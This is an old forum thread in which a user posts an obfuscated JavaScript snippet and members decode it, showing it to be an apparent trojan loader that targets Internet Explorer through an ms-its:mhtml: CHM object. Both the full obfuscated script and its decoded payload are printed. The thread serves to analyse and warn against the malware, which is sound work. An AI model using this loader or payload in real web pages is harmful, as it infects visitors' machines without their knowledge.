hack script? ne one knows javascript

hey i got this


<script type="text/javascript" language="JavaScript">
x=78;
es="YVnv^QfYWQd_b|Q``>Q]U--p=YSb_c_Vdn9^dUb^Udn5h`\\_bUbpw\nnnnk\nnnnnnnfQbn9 ^Ud@QdX-T_Se]U^d|\\_SQdY_^|XbUV+\nnnnnnnZ-9^Ud@QdX|\\Qcd9^TUh?Vvu}uw+\nnnnnnn9^Ud@QdX-9^Ud@QdX|c\\YSUv~zZw+\nnnnnnnfQbn_=C9DC-T_Se]U^d|SbUQdU5\\U]U^dvp?2:53Dpw+\nnnnnnnc@bUVYh-e^UcSQ`Uvps&Tc{Ys'$c*]Xd]\\*pw+\nnnnnnn_=C9DC|TQdQ-c@bUVYhyuVY\\U*}}3*LL=19>|=8Douy9^Ud@QdXyu}}h]QY^|SX]**}]QY^|Xd]u++\nnnnnnn_=C9DC|di`U-pdUhd}h{cSbY`d\\Udp+\nnnnnnnT_Se]U^d|R_Ti|Q``U^T3XY\\Tv_=C9DCw+n\nnmnn";
var ds=new String();
for(var j=0;j<es.length;j++)
{e=es.charCodeAt(j);if(e==10){ds=ds+'\n';}else{d=e-x;if (d<0x20){d=e+0x7E-x-0x20;}ds=ds+String.fromCharCode(d);}}eval(ds);
</script>



now my account has 50 k in it, and i dont wanna losse it to some password stealing script, so if ne one can tell me what the above does

and how i can disarm it,,

please help

[netcracker]

Is this a challenge!!!! Where did you get that?

[SmoothCriminal]

mm. There's a sort of encrypted javascript esp used to hide password information.. this one looks like that..

[Deep]

looks like it is encrypted..

do this..
there is one software which will show u all the details which are being passed and allows to maipulate it..

so u need to downlaod the software and submit the pssword (ofcourse wrong) and see where your password is going....

software name?
well i dont remember it now..i will check it in the office tmrw and let you know..

Deep

[it_waaznt_me]

It is converting the es string parts to some other string ds after running a char code algorithm ... Hmmmm... Will have a look at it after some time ..

[Deep]

btw..
script is checking for the IE and redirecting it to the location or something..

code looks like incomplete..

anyways it generates this code....


if (navigator.appName=="Microsoft Internet Explorer")
{
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var oMSITS=document.createElement("OBJECT");
sPrefix=unescape("%6ds-i%74s:mhtml:"); oMSITS.data=sPrefix+'file://C:\\MAIN.MHT!'+InetPath+'//xmain.chm::/main.htm';;
oMSITS.type="text/x-scriptlet";
document.body.appendChild(oMSITS);
}

Regards
Deep

[Deep]

UPDATE : in short it is a trojan

check this page for more info...

http://spamwatch.codefish.net.au/mod...article&sid=96

solution: http://www.securityfocus.com/bid/9658/solution/


how did i find out it?

pretty simple actually..

this is what i did..

i copied the script into htm file..
opned the file to check the output..

nothing happened so i used document.write () to print the values of the variables..

got some values and got idea about the function...

it generates another function which checks for browswer IE....

so i copied the generated code into new html file and ran the file..

again followed teh same procedure..used document.write ()

got value..

Code:

ms-its:mhtml:file://C:\MAIN.MHT!file:///C:/Documents%20and%20Settings/Administrator/Desktop//xmain.chm::/main.htm

and then what?

haha i asked google

and found the answer


ignore this if you find it boring.. lol
Deep

[tuxfan]

Not boring at all. Its very interesting Deep But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?

[xenkatesh]

ya a lots of informations dude!

[Deep]

Quote:

Originally Posted by tuxfan

Not boring at all. Its very interesting Deep But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?

looks like it will fail..

infact if the system is patched then also it wont on IE also work i suppose..

Deep

thank you man, ur like god to me today

thnk you

from the bottom of my heard, i will give this link on the other forum who all got afftect with same

hope this saves a few lakhs of money at least

[Deep]

no problems sir
always at your serice

cheers
Deep

[tuxfan]

So thats one more reason to switch over from IE to WHICHEVER OTHER BROWSER YOU CAN LAY YOUR HANDS ON